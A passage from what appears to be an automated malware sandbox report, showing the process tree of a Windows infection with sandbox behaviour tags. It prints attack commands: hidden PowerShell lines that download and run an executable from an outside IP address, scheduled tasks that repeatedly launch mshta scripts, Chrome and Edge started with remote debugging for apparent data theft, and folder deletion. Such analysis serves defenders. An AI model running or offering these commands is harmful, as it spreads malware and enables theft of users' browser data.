        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=3276 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:18772
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4160,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=4180 /prefetch:2
        10⤵
        Uses browser remote debugging
        
        PID:18660
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4596,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=4616 /prefetch:8
        10⤵
        
        PID:14824
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4744,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=4780 /prefetch:1
        10⤵
        Uses browser remote debugging
        
        PID:14828
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4236,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=4904 /prefetch:8
        10⤵
        
        PID:14928
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5492,i,18334727372015973156,16403019895063895187,262144 --variations-seed-version --mojo-platform-channel-handle=5504 /prefetch:8
        10⤵
        
        PID:15164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
        9⤵
        Uses browser remote debugging
        
        PID:5344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch
        10⤵
        Uses browser remote debugging
        
        PID:5364
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffad79df208,0x7ffad79df214,0x7ffad79df220
        11⤵
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1832,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=2556 /prefetch:3
        11⤵
        
        PID:9160
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2528,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:2
        11⤵
        
        PID:4888
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1772,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=2564 /prefetch:8
        11⤵
        
        PID:5964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3488,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:4928
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3496,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=3560 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:3940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4288,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=5144 /prefetch:8
        11⤵
        
        PID:15372
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4948,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=5168 /prefetch:8
        11⤵
        
        PID:15556
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5764,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=5816 /prefetch:8
        11⤵
        
        PID:9164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:8
        11⤵
        
        PID:4692
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,8403947147141648994,12337188898382863515,262144 --variations-seed-version --mojo-platform-channel-handle=6028 /prefetch:8
        11⤵
        
        PID:380
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\KEGCBKKJDH.exe"
        9⤵
        
        PID:8976
        
        C:\Users\Admin\KEGCBKKJDH.exe
        
        "C:\Users\Admin\KEGCBKKJDH.exe"
        10⤵
        
        PID:6488
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:6676
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DHDHJJJECF.exe"
        9⤵
        
        PID:9032
        
        C:\Users\Admin\DHDHJJJECF.exe
        
        "C:\Users\Admin\DHDHJJJECF.exe"
        10⤵
        
        PID:9104
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:9176
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DHIEBAAKJD.exe"
        9⤵
        
        PID:6476
        
        C:\Users\Admin\DHIEBAAKJD.exe
        
        "C:\Users\Admin\DHIEBAAKJD.exe"
        10⤵
        
        PID:6812
        
        C:\Users\Admin\AppData\Local\Temp\phVcTifR\KAa2mSayDA9H9tPg.exe
        
        C:\Users\Admin\AppData\Local\Temp\phVcTifR\KAa2mSayDA9H9tPg.exe 0
        11⤵
        
        PID:9240
        
        C:\Users\Admin\AppData\Local\Temp\phVcTifR\3m0MbupslFMn3opm.exe
        
        C:\Users\Admin\AppData\Local\Temp\phVcTifR\3m0MbupslFMn3opm.exe 9240
        12⤵
        
        PID:9288
        
        C:\ProgramData\2noh4ekngv.exe
        
        "C:\ProgramData\2noh4ekngv.exe"
        7⤵
        
        PID:8564
        
        C:\Users\Admin\AppData\Local\Temp\BJvBDMeq\E7eO1poKZaLYltrI.exe
        
        C:\Users\Admin\AppData\Local\Temp\BJvBDMeq\E7eO1poKZaLYltrI.exe 0
        8⤵
        
        PID:6924
        
        C:\Users\Admin\AppData\Local\Temp\BJvBDMeq\6Rmw54ojWUU5DlM9.exe
        
        C:\Users\Admin\AppData\Local\Temp\BJvBDMeq\6Rmw54ojWUU5DlM9.exe 6924
        9⤵
        
        PID:8092
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8092 -s 844
        10⤵
        Program crash
        
        PID:14972
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6924 -s 672
        9⤵
        Program crash
        
        PID:2252
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\3o8y5" & exit
        7⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        8⤵
        Delays execution with timeout.exe
        
        PID:544
    - - C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028100101\crypted.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1376
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:2788
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4272
    - - C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
        5⤵
        
        PID:6436
      - C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\crypted.exe"
        6⤵
        
        PID:6412
    - - C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10029600101\mrwipre12.exe"
        5⤵
        
        PID:6420
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:6616
    - - C:\Users\Admin\AppData\Local\Temp\10030660101\kollfdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10030660101\kollfdsf.exe"
        5⤵
        
        PID:7072
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:6432
    - - C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe"
        5⤵
        
        PID:4888
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10030740101\e80c7de81f.exe"
        6⤵
        
        PID:2464
    - - C:\Users\Admin\AppData\Local\Temp\10030750101\cefac3a2c7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10030750101\cefac3a2c7.exe"
        5⤵
        
        PID:3600
      - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10030750101\cefac3a2c7.exe"
        6⤵
        
        PID:14996
- - C:\Users\Admin\AppData\Local\Temp\10238500101\cfce26c921.exe
    "C:\Users\Admin\AppData\Local\Temp\10238500101\cfce26c921.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1396
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn 6yPjMmaQNaw /tr "mshta C:\Users\Admin\AppData\Local\Temp\wewY0r1Ls.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4968
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn 6yPjMmaQNaw /tr "mshta C:\Users\Admin\AppData\Local\Temp\wewY0r1Ls.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5364
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\wewY0r1Ls.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4720
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2968
      - C:\Users\Admin\AppData\Local\TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE
        
        "C:\Users\Admin\AppData\Local\TempCARCQC0C6WTH8NZAOFLQEKZREJRVYPTH.EXE"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:6116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10238510121\am_no.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1876
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      System Location Discovery: System Language Discovery
      Delays execution with timeout.exe
      PID:5288
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1648
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2032
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2088
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:384
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2252
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "YyCJumatfsP" /tr "mshta \"C:\Temp\hjczKo0vM.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:504
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\hjczKo0vM.hta"
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4928
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4016
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3976
- - C:\Users\Admin\AppData\Local\Temp\10238890101\9078a8a5bd.exe
    "C:\Users\Admin\AppData\Local\Temp\10238890101\9078a8a5bd.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3436
- - C:\Users\Admin\AppData\Local\Temp\10238900101\7839a22f78.exe
    "C:\Users\Admin\AppData\Local\Temp\10238900101\7839a22f78.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\TK5GI6UDIAI28SA1401E.exe
      "C:\Users\Admin\AppData\Local\Temp\TK5GI6UDIAI28SA1401E.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5932
- - C:\Users\Admin\AppData\Local\Temp\10238910101\3ca9ad24eb.exe
    "C:\Users\Admin\AppData\Local\Temp\10238910101\3ca9ad24eb.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:2824
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
      4⤵
      Uses browser remote debugging
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2424
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffae504dcf8,0x7ffae504dd04,0x7ffae504dd10
        5⤵
        
        PID:3472
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1956,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1948 /prefetch:2
        5⤵
        
        PID:4572
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2108 /prefetch:3
        5⤵
        
        PID:1728
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2472 /prefetch:8
        5⤵
        
        PID:3992
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3204 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:4800
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3224 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3184
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4224,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4244 /prefetch:2
        5⤵
        Uses browser remote debugging
        
        PID:6000
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4580 /prefetch:1
        5⤵
        Uses browser remote debugging
        
        PID:3160
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4832,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4836 /prefetch:8
        5⤵
        
        PID:2888
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4728,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4720 /prefetch:8
        5⤵
        
        PID:4348
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5376,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5332 /prefetch:8
        5⤵
        
        PID:4832
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5392,i,12058161872483947412,8073756298748808004,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5412 /prefetch:8
        5⤵
        
        PID:4196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
